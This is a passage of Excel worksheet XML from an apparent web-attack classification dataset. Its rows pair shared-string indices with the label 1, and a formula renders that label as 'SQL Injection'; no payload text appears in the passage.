        <v>14979</v>
      </c>
      <c r="B17392">
        <v>1</v>
      </c>
      <c r="C17392" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17393" s="1" t="s">
        <v>14328</v>
      </c>
      <c r="B17393">
        <v>1</v>
      </c>
      <c r="C17393" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17394" s="1" t="s">
        <v>25798</v>
      </c>
      <c r="B17394">
        <v>1</v>
      </c>
      <c r="C17394" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17395" s="1" t="s">
        <v>15304</v>
      </c>
      <c r="B17395">
        <v>1</v>
      </c>
      <c r="C17395" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17396" s="1" t="s">
        <v>16921</v>
      </c>
      <c r="B17396">
        <v>1</v>
      </c>
      <c r="C17396" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17397" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17397" s="1" t="s">
        <v>16238</v>
      </c>
      <c r="B17397">
        <v>1</v>
      </c>
      <c r="C17397" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17398" s="1" t="s">
        <v>19043</v>
      </c>
      <c r="B17398">
        <v>1</v>
      </c>
      <c r="C17398" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17399" s="1" t="s">
        <v>18471</v>
      </c>
      <c r="B17399">
        <v>1</v>
      </c>
      <c r="C17399" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17400" s="1" t="s">
        <v>19816</v>
      </c>
      <c r="B17400">
        <v>1</v>
      </c>
      <c r="C17400" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17401" s="1" t="s">
        <v>24648</v>
      </c>
      <c r="B17401">
        <v>1</v>
      </c>
      <c r="C17401" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17402" s="1" t="s">
        <v>15260</v>
      </c>
      <c r="B17402">
        <v>1</v>
      </c>
      <c r="C17402" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17403" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17403" s="1" t="s">
        <v>15306</v>
      </c>
      <c r="B17403">
        <v>1</v>
      </c>
      <c r="C17403" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17404" s="1" t="s">
        <v>24745</v>
      </c>
      <c r="B17404">
        <v>1</v>
      </c>
      <c r="C17404" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17405" s="1" t="s">
        <v>19497</v>
      </c>
      <c r="B17405">
        <v>1</v>
      </c>
      <c r="C17405" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17406" s="1" t="s">
        <v>12664</v>
      </c>
      <c r="B17406">
        <v>1</v>
      </c>
      <c r="C17406" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17407" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17407" s="1" t="s">
        <v>13632</v>
      </c>
      <c r="B17407">
        <v>1</v>
      </c>
      <c r="C17407" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17408" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17408" s="1" t="s">
        <v>13221</v>
      </c>
      <c r="B17408">
        <v>1</v>
      </c>
      <c r="C17408" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17409" s="1" t="s">
        <v>24616</v>
      </c>
      <c r="B17409">
        <v>1</v>
      </c>
      <c r="C17409" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17410" s="1" t="s">
        <v>17913</v>
      </c>
      <c r="B17410">
        <v>1</v>
      </c>
      <c r="C17410" s="7" t="str">
        <f t="shared" si="271"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17411" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17411" s="1" t="s">
        <v>26488</v>
      </c>
      <c r="B17411">
        <v>1</v>
      </c>
      <c r="C17411" s="7" t="str">
        <f t="shared" ref="C17411:C17474" si="272">IF(B17411=0,"No Attack", IF(B17411=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17412" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17412" s="1" t="s">
        <v>18567</v>
      </c>
      <c r="B17412">
        <v>1</v>
      </c>
      <c r="C17412" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17413" s="1" t="s">
        <v>16504</v>
      </c>
      <c r="B17413">
        <v>1</v>
      </c>
      <c r="C17413" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17414" s="1" t="s">
        <v>16422</v>
      </c>
      <c r="B17414">
        <v>1</v>
      </c>
      <c r="C17414" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17415" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17415" s="1" t="s">
        <v>24972</v>
      </c>
      <c r="B17415">
        <v>1</v>
      </c>
      <c r="C17415" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17416" s="1" t="s">
        <v>18092</v>
      </c>
      <c r="B17416">
        <v>1</v>
      </c>
      <c r="C17416" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17417" s="1" t="s">
        <v>14145</v>
      </c>
      <c r="B17417">
        <v>1</v>
      </c>
      <c r="C17417" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17418" s="1" t="s">
        <v>25634</v>
      </c>
      <c r="B17418">
        <v>1</v>
      </c>
      <c r="C17418" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17419" s="1" t="s">
        <v>12061</v>
      </c>
      <c r="B17419">
        <v>1</v>
      </c>
      <c r="C17419" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17420" s="1" t="s">
        <v>13938</v>
      </c>
      <c r="B17420">
        <v>1</v>
      </c>
      <c r="C17420" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17421" s="1" t="s">
        <v>17279</v>
      </c>
      <c r="B17421">
        <v>1</v>
      </c>
      <c r="C17421" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17422" s="1" t="s">
        <v>16795</v>
      </c>
      <c r="B17422">
        <v>1</v>
      </c>
      <c r="C17422" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17423" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17423" s="1" t="s">
        <v>25694</v>
      </c>
      <c r="B17423">
        <v>1</v>
      </c>
      <c r="C17423" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17424" s="1" t="s">
        <v>15203</v>
      </c>
      <c r="B17424">
        <v>1</v>
      </c>
      <c r="C17424" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17425" s="1" t="s">
        <v>12211</v>
      </c>
      <c r="B17425">
        <v>1</v>
      </c>
      <c r="C17425" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17426" s="1" t="s">
        <v>19232</v>
      </c>
      <c r="B17426">
        <v>1</v>
      </c>
      <c r="C17426" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17427" s="1" t="s">
        <v>19263</v>
      </c>
      <c r="B17427">
        <v>1</v>
      </c>
      <c r="C17427" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17428" s="1" t="s">
        <v>25065</v>
      </c>
      <c r="B17428">
        <v>1</v>
      </c>
      <c r="C17428" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17429" s="1" t="s">
        <v>17008</v>
      </c>
      <c r="B17429">
        <v>1</v>
      </c>
      <c r="C17429" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17430" s="1" t="s">
        <v>15213</v>
      </c>
      <c r="B17430">
        <v>1</v>
      </c>
      <c r="C17430" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17431" s="1" t="s">
        <v>12968</v>
      </c>
      <c r="B17431">
        <v>1</v>
      </c>
      <c r="C17431" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17432" s="1" t="s">
        <v>18916</v>
      </c>
      <c r="B17432">
        <v>1</v>
      </c>
      <c r="C17432" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17433" s="1" t="s">
        <v>18452</v>
      </c>
      <c r="B17433">
        <v>1</v>
      </c>
      <c r="C17433" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17434" s="1" t="s">
        <v>16432</v>
      </c>
      <c r="B17434">
        <v>1</v>
      </c>
      <c r="C17434" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17435" s="1" t="s">
        <v>26644</v>
      </c>
      <c r="B17435">
        <v>1</v>
      </c>
      <c r="C17435" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17436" s="1" t="s">
        <v>13959</v>
      </c>
      <c r="B17436">
        <v>1</v>
      </c>
      <c r="C17436" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17437" s="1" t="s">
        <v>24430</v>
      </c>
      <c r="B17437">
        <v>1</v>
      </c>
      <c r="C17437" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17438" s="1" t="s">
        <v>15598</v>
      </c>
      <c r="B17438">
        <v>1</v>
      </c>
      <c r="C17438" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17439" s="1" t="s">
        <v>18775</v>
      </c>
      <c r="B17439">
        <v>1</v>
      </c>
      <c r="C17439" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17440" s="1" t="s">
        <v>19242</v>
      </c>
      <c r="B17440">
        <v>1</v>
      </c>
      <c r="C17440" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17441" s="1" t="s">
        <v>18192</v>
      </c>
      <c r="B17441">
        <v>1</v>
      </c>
      <c r="C17441" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17442" s="1" t="s">
        <v>16263</v>
      </c>
      <c r="B17442">
        <v>1</v>
      </c>
      <c r="C17442" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17443" s="1" t="s">
        <v>12702</v>
      </c>
      <c r="B17443">
        <v>1</v>
      </c>
      <c r="C17443" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17444" s="1" t="s">
        <v>18077</v>
      </c>
      <c r="B17444">
        <v>1</v>
      </c>
      <c r="C17444" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17445" s="1" t="s">
        <v>26254</v>
      </c>
      <c r="B17445">
        <v>1</v>
      </c>
      <c r="C17445" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17446" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17446" s="1" t="s">
        <v>13876</v>
      </c>
      <c r="B17446">
        <v>1</v>
      </c>
      <c r="C17446" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17447" s="1" t="s">
        <v>13287</v>
      </c>
      <c r="B17447">
        <v>1</v>
      </c>
      <c r="C17447" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17448" s="1" t="s">
        <v>18050</v>
      </c>
      <c r="B17448">
        <v>1</v>
      </c>
      <c r="C17448" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17449" s="1" t="s">
        <v>19836</v>
      </c>
      <c r="B17449">
        <v>1</v>
      </c>
      <c r="C17449" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17450" s="1" t="s">
        <v>24398</v>
      </c>
      <c r="B17450">
        <v>1</v>
      </c>
      <c r="C17450" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17451" s="1" t="s">
        <v>14418</v>
      </c>
      <c r="B17451">
        <v>1</v>
      </c>
      <c r="C17451" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17452" s="1" t="s">
        <v>24956</v>
      </c>
      <c r="B17452">
        <v>1</v>
      </c>
      <c r="C17452" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17453" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17453" s="1" t="s">
        <v>25654</v>
      </c>
      <c r="B17453">
        <v>1</v>
      </c>
      <c r="C17453" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17454" s="1" t="s">
        <v>13918</v>
      </c>
      <c r="B17454">
        <v>1</v>
      </c>
      <c r="C17454" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17455" s="1" t="s">
        <v>14314</v>
      </c>
      <c r="B17455">
        <v>1</v>
      </c>
      <c r="C17455" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17456" s="1" t="s">
        <v>17282</v>
      </c>
      <c r="B17456">
        <v>1</v>
      </c>
      <c r="C17456" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17457" s="1" t="s">
        <v>14894</v>
      </c>
      <c r="B17457">
        <v>1</v>
      </c>
      <c r="C17457" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17458" s="1" t="s">
        <v>19520</v>
      </c>
      <c r="B17458">
        <v>1</v>
      </c>
      <c r="C17458" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17459" s="1" t="s">
        <v>25545</v>
      </c>
      <c r="B17459">
        <v>1</v>
      </c>
      <c r="C17459" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17460" s="1" t="s">
        <v>17688</v>
      </c>
      <c r="B17460">
        <v>1</v>
      </c>
      <c r="C17460" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17461" s="1" t="s">
        <v>24705</v>
      </c>
      <c r="B17461">
        <v>1</v>
      </c>
      <c r="C17461" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17462" s="1" t="s">
        <v>15212</v>
      </c>
      <c r="B17462">
        <v>1</v>
      </c>
      <c r="C17462" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17463" s="1" t="s">
        <v>18902</v>
      </c>
      <c r="B17463">
        <v>1</v>
      </c>
      <c r="C17463" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17464" s="1" t="s">
        <v>14115</v>
      </c>
      <c r="B17464">
        <v>1</v>
      </c>
      <c r="C17464" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17465" s="1" t="s">
        <v>15379</v>
      </c>
      <c r="B17465">
        <v>1</v>
      </c>
      <c r="C17465" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17466" s="1" t="s">
        <v>25326</v>
      </c>
      <c r="B17466">
        <v>1</v>
      </c>
      <c r="C17466" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17467" s="1" t="s">
        <v>14986</v>
      </c>
      <c r="B17467">
        <v>1</v>
      </c>
      <c r="C17467" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17468" s="1" t="s">
        <v>26485</v>
      </c>
      <c r="B17468">
        <v>1</v>
      </c>
      <c r="C17468" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17469" s="1" t="s">
        <v>15465</v>
      </c>
      <c r="B17469">
        <v>1</v>
      </c>
      <c r="C17469" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17470" s="1" t="s">
        <v>19192</v>
      </c>
      <c r="B17470">
        <v>1</v>
      </c>
      <c r="C17470" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17471" s="1" t="s">
        <v>14443</v>
      </c>
      <c r="B17471">
        <v>1</v>
      </c>
      <c r="C17471" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17472" s="1" t="s">
        <v>14466</v>
      </c>
      <c r="B17472">
        <v>1</v>
      </c>
      <c r="C17472" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17473" s="1" t="s">
        <v>12354</v>
      </c>
      <c r="B17473">
        <v>1</v>
      </c>
      <c r="C17473" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17474" s="1" t="s">
        <v>18038</v>
      </c>
      <c r="B17474">
        <v>1</v>
      </c>
      <c r="C17474" s="7" t="str">
        <f t="shared" si="272"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17475" s="1" t="s">
        <v>17605</v>
      </c>
      <c r="B17475">
        <v>1</v>
      </c>
      <c r="C17475" s="7" t="str">
        <f t="shared" ref="C17475:C17538" si="273">IF(B17475=0,"No Attack", IF(B17475=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17476" s="1" t="s">
        <v>26422</v>
      </c>
      <c r="B17476">
        <v>1</v>
      </c>
      <c r="C17476" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17477" s="1" t="s">
        <v>13217</v>
      </c>
      <c r="B17477">
        <v>1</v>
      </c>
      <c r="C17477" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17478" s="1" t="s">
        <v>14199</v>
      </c>
      <c r="B17478">
        <v>1</v>
      </c>
      <c r="C17478" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17479" s="1" t="s">
        <v>16943</v>
      </c>
      <c r="B17479">
        <v>1</v>
      </c>
      <c r="C17479" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17480" s="1" t="s">
        <v>20005</v>
      </c>
      <c r="B17480">
        <v>1</v>
      </c>
      <c r="C17480" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17481" s="1" t="s">
        <v>17739</v>
      </c>
      <c r="B17481">
        <v>1</v>
      </c>
      <c r="C17481" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17482" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17482" s="1" t="s">
        <v>19902</v>
      </c>
      <c r="B17482">
        <v>1</v>
      </c>
      <c r="C17482" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17483" s="1" t="s">
        <v>16341</v>
      </c>
      <c r="B17483">
        <v>1</v>
      </c>
      <c r="C17483" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17484" s="1" t="s">
        <v>25975</v>
      </c>
      <c r="B17484">
        <v>1</v>
      </c>
      <c r="C17484" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17485" s="1" t="s">
        <v>16853</v>
      </c>
      <c r="B17485">
        <v>1</v>
      </c>
      <c r="C17485" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17486" s="1" t="s">
        <v>15231</v>
      </c>
      <c r="B17486">
        <v>1</v>
      </c>
      <c r="C17486" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17487" s="1" t="s">
        <v>19072</v>
      </c>
      <c r="B17487">
        <v>1</v>
      </c>
      <c r="C17487" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17488" s="1" t="s">
        <v>25571</v>
      </c>
      <c r="B17488">
        <v>1</v>
      </c>
      <c r="C17488" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17489" s="1" t="s">
        <v>26198</v>
      </c>
      <c r="B17489">
        <v>1</v>
      </c>
      <c r="C17489" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17490" s="1" t="s">
        <v>13603</v>
      </c>
      <c r="B17490">
        <v>1</v>
      </c>
      <c r="C17490" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17491" s="1" t="s">
        <v>13247</v>
      </c>
      <c r="B17491">
        <v>1</v>
      </c>
      <c r="C17491" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17492" s="1" t="s">
        <v>16799</v>
      </c>
      <c r="B17492">
        <v>1</v>
      </c>
      <c r="C17492" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17493" s="1" t="s">
        <v>24792</v>
      </c>
      <c r="B17493">
        <v>1</v>
      </c>
      <c r="C17493" s="7" t="str">
        <f t="shared" si="273"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17494" s="1" t="s">
        <v>17864</v>
      </c>
      <c r="B17494">
